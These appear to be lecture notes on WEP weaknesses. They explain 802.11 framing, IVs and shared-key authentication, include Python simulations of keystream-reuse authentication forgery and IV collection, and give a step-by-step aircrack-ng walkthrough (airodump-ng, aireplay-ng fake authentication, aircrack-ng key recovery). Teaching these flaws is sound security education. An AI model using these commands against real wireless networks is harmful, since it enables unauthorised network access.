Background on Wi-Fi
802.11 over-the-air protocol
802.11a/b/g/n: speeds, frequencies, range
◦ Range is reduced by physical obstructions and by interference on the same band
◦ Example of interference: a cordless phone
Wireless Frames/Packets
Framing:
◦ Management frames: sent in the clear (the one WEP-encrypted management payload is the shared-key authentication challenge response)
◦ Control frames: sent in the clear
◦ Data frames: payload encrypted when WEP is enabled
Error detection: a CRC-32 frame check sequence on every frame, plus a CRC-32 integrity check value (ICV) inside each WEP-encrypted payload
Collecting Frames
Important part: the Initialization Vector (IV)
◦ A 24-bit value that the sender prepends, in clear text, to every WEP-encrypted frame. It is concatenated with the pre-shared key that all authenticated clients know to form the RC4 seed, so the IV is the only part of the seed that changes from frame to frame.
◦ Present in the encrypted challenge response of every shared-key authentication.
◦ Present in every WEP-encrypted data frame; these are the frames a sniffer collects, because the key is recovered from the statistics of many distinct IVs.
Wired Equivalent Privacy (WEP)
Ratified in 1997; deprecated in 2004
Intended to protect the confidentiality of data
Intended to prevent unauthorized access to the network
Hexadecimal 64/128/256-bit keys (the advertised size includes the 24-bit IV, so the secret part is 40/104/232 bits)
Authentication (shared key)
The client station sends an authentication request to the Access Point.
The Access Point sends back a clear-text challenge.
The client encrypts the challenge text using the configured WEP key and sends it back in a second authentication request.
The Access Point decrypts the response and compares it with the clear-text challenge it sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.
Because both the clear-text challenge and its encrypted form cross the air, anyone sniffing the exchange learns the RC4 keystream for that IV and can answer any later challenge without the key.
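The four-step exchange above, modelled in Python and followed by the attack it invites. This is an added example, not code from the original slides or from any tool: the 40-bit key, the IV, the station names and the challenge bytes are all constructed, and only the WEP-relevant fields of a frame (IV, key-index byte, ciphertext, ICV) are modelled. The second half is what aireplay-ng's fake authentication relies on against shared-key networks: XOR of the sniffed challenge and response gives 132 bytes of keystream, enough to forge a response to a fresh challenge.

```python
"""Added example (not from the original slides): WEP shared-key authentication
and the keystream-reuse flaw it leaks.  Key, IV, challenge and station names
are constructed for this example."""
import random
import zlib

KEY_ID = 0            # WEP allows four configured keys; the index byte is sent in clear
CHALLENGE_LEN = 128   # the shared-key challenge text is 128 bytes


def rc4(key: bytes, data: bytes) -> bytes:
    """XOR data with the RC4 keystream derived from key (KSA, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || key-index byte || RC4(IV||key, plaintext || ICV).
    The 24-bit IV travels in the clear; only the last part is encrypted."""
    return iv + bytes([KEY_ID << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext, or None when the ICV does not verify."""
    iv, ciphertext = body[:3], body[4:]
    plain = rc4(iv + key, ciphertext)
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


class AccessPoint:
    """AP side of the exchange: hand out challenges, verify responses."""

    def __init__(self, key: bytes, rng: random.Random):
        self.key, self.rng, self.pending = key, rng, {}

    def challenge(self, sta: str) -> bytes:
        # step 2: answer the authentication request with a clear-text challenge
        text = bytes(self.rng.getrandbits(8) for _ in range(CHALLENGE_LEN))
        self.pending[sta] = text
        return text

    def verify(self, sta: str, response: bytes) -> bool:
        # step 4: decrypt the response and compare it with what we sent
        expected = self.pending.pop(sta, None)
        return expected is not None and wep_decrypt(self.key, response) == expected


def client_respond(key: bytes, challenge: bytes, iv: bytes) -> bytes:
    # step 3: a legitimate station encrypts the challenge under the shared key
    return wep_encrypt(key, iv, challenge)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def run_exchange():
    """A legitimate login, then a forged login built only from sniffed frames."""
    rng = random.Random(0x5EED)                # constructed: deterministic run
    key = bytes.fromhex("0123456789")          # constructed 40-bit WEP key
    iv = bytes.fromhex("a1b2c3")               # constructed IV chosen by the client
    ap = AccessPoint(key, rng)

    chal1 = ap.challenge("sta-legit")          # sniffed by the attacker (clear text)
    resp1 = client_respond(key, chal1, iv)     # sniffed by the attacker (encrypted)
    legit_ok = ap.verify("sta-legit", resp1)

    # (challenge || ICV) XOR ciphertext = the RC4 keystream for this IV
    keystream = xor(chal1 + icv(chal1), resp1[4:])

    # Reuse the IV and keystream to answer a brand-new challenge, no key needed
    chal2 = ap.challenge("sta-evil")
    forged = iv + bytes([KEY_ID << 6]) + xor(chal2 + icv(chal2), keystream)
    forged_ok = ap.verify("sta-evil", forged)
    return legit_ok, forged_ok, len(keystream)


if __name__ == "__main__":
    print(run_exchange())   # (True, True, 132)
```

The forgery works because WEP lets the sender pick the IV and the AP never rejects a repeated one; the same keystream also decrypts the first 132 bytes of any data frame sent under that IV.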
War Chalking / War Driving
War Chalking: the practice of marking sidewalks and walls with special symbols to indicate that wireless access is available nearby.
War Driving: driving around in a vehicle, or parking at interesting places, with the goal of discovering easy-to-get-into wireless networks.
Alternative Security
WPA/WPA2
◦ Random key of 10 digits or longer
◦ (1000) single-core computer: 500 years to crack
◦ The protection is only as strong as the passphrase: a dictionary word is recovered offline from a single captured 4-way handshake, so the random-key requirement is not optional
VPN
◦ Required authentication
◦ Username/password
Cracking WEP
Tools = Aircrack-ng suite / Kismet
Kismet
◦ Discover wireless networks
Airodump-ng
◦ Capture packets (collect IVs)
Aircrack-ng
◦ Recover the key from the collected IVs using statistical attacks (FMS/KoreK, PTW); brute force is a fallback, not the main method
Aireplay-ng
◦ Packet injection (fake authentication, replay) to make the network produce IVs faster
Capture packets
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
-c 9 is the channel of the wireless network.
--bssid 00:14:6C:7E:40:80 is the access point MAC address; it filters out extraneous traffic from other networks.
-w output is the file-name prefix for the capture files that will contain the IVs.
ath0 is the interface name (it must be in monitor mode).
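What the capture step is collecting, shown on raw frames. This is an added example and not code from the original slides or from aircrack-ng: it parses 802.11 data frames, applies the same BSSID filter as `--bssid`, pulls out the clear-text IV described in the Collecting Frames section, and counts distinct and reused IVs. Assumptions: frames are raw 802.11 with no radiotap header and no trailing FCS; the client and AP MACs are the ones from the slides, the neighbouring AP and all IVs are constructed; the "weak IV" check is the classic FMS pattern (first byte in 3..3+keylen-1, second byte 0xFF), one of the IV classes aircrack-ng's statistical attacks use.

```python
"""Added example (not from the original slides or aircrack-ng): extract and
count WEP IVs from raw 802.11 frames, filtered to one BSSID."""
from collections import Counter

TYPE_DATA = 2

AP = bytes.fromhex("00146C7E4080")          # --bssid from the slides
STA = bytes.fromhex("000FB588AC82")         # client MAC from the slides
OTHER_AP = bytes.fromhex("001122334455")    # constructed neighbouring AP
BCAST = b"\xff" * 6


def build_frame(fc0: int, fc1: int, a1: bytes, a2: bytes, a3: bytes,
                body: bytes) -> bytes:
    """Raw 802.11 frame: frame control, duration, addr1-3, sequence control, body."""
    return bytes([fc0, fc1]) + b"\x00\x00" + a1 + a2 + a3 + b"\x10\x00" + body


def parse_wep_iv(frame: bytes):
    """Return (bssid, iv, key_id) for a WEP-protected data frame, else None."""
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != TYPE_DATA or not fc1 & 0x40:   # type, Protected bit
        return None
    to_ds, from_ds = bool(fc1 & 0x1), bool(fc1 & 0x2)
    if to_ds and from_ds:
        return None                  # 4-address (WDS) frame: no single BSSID, skip
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = a1 if to_ds else a2 if from_ds else a3   # where 802.11 puts the BSSID
    hdr = 24 + (2 if fc0 & 0x80 else 0)              # QoS data adds a 2-byte field
    iv = frame[hdr:hdr + 3]                          # 24-bit IV, transmitted in clear
    key_id = frame[hdr + 3] >> 6                     # key index in the top two bits
    return bssid, iv, key_id


def is_fms_weak(iv: bytes, key_len: int = 5) -> bool:
    """Classic FMS weak IV: (A+3, 0xFF, X) with 0 <= A < key_len."""
    return 3 <= iv[0] < 3 + key_len and iv[1] == 0xFF


def collect_ivs(frames, bssid: bytes) -> dict:
    """Mimic `airodump-ng --bssid`: keep IVs only for the selected AP."""
    seen = Counter()
    weak = 0
    for f in frames:
        parsed = parse_wep_iv(f)
        if parsed is None or parsed[0] != bssid:
            continue
        iv = parsed[1]
        if iv not in seen and is_fms_weak(iv):
            weak += 1
        seen[iv] += 1
    return {
        "unique_ivs": len(seen),
        "data_frames": sum(seen.values()),
        "weak_ivs": weak,
        "reused": [iv.hex() for iv, n in seen.items() if n > 1],
    }


def wep_body(iv_hex: str, key_id: int = 0) -> bytes:
    """IV || key-index byte || placeholder ciphertext+ICV (contents do not matter here)."""
    return bytes.fromhex(iv_hex) + bytes([key_id << 6]) + b"\x00" * 8


def sample_capture():
    """Constructed capture: a few frames a sniffer on channel 9 might see."""
    return [
        build_frame(0x80, 0x00, BCAST, AP, AP, b"\x00" * 12),            # beacon: no IV
        build_frame(0x08, 0x01, AP, STA, BCAST, b"\xaa" * 12),           # data, not WEP
        build_frame(0x08, 0x41, AP, STA, BCAST, wep_body("a1b2c3")),     # STA -> AP
        build_frame(0x08, 0x42, STA, AP, STA, wep_body("03ff10")),       # AP -> STA, weak IV
        build_frame(0x08, 0x41, AP, STA, BCAST, wep_body("000001")),
        build_frame(0x08, 0x41, AP, STA, BCAST, wep_body("a1b2c3")),     # IV reused
        build_frame(0x88, 0x42, STA, AP, STA, b"\x00\x00" + wep_body("04ff22")),  # QoS data
        build_frame(0x08, 0x42, STA, OTHER_AP, STA, wep_body("deadbe")), # other BSSID
    ]


if __name__ == "__main__":
    print(collect_ivs(sample_capture(), AP))
```

Only the five WEP-protected data frames from the chosen BSSID count; the beacon, the unencrypted frame and the neighbour's traffic are dropped exactly as the `--bssid` filter drops them. With a 24-bit IV space, reuse (the `a1b2c3` repeat) is inevitable on a busy network, which is why the cracking step wants tens of thousands of distinct IVs.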
Packet Injection
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
-1 means fake authentication
0 is the re-association timing in seconds
-e teddy is the wireless network name (ESSID)
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card's MAC address
ath0 is the wireless interface name
Fake authentication only associates our MAC with the AP so that injected frames are accepted; it produces no IVs by itself, so it is followed by a replay attack (for example aireplay-ng -3, ARP request replay) that makes the AP emit new IVs quickly.
Cracking the captured packets
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional, since the original capture was already filtered to this one AP.
output*.cap selects all files starting with "output" and ending in ".cap".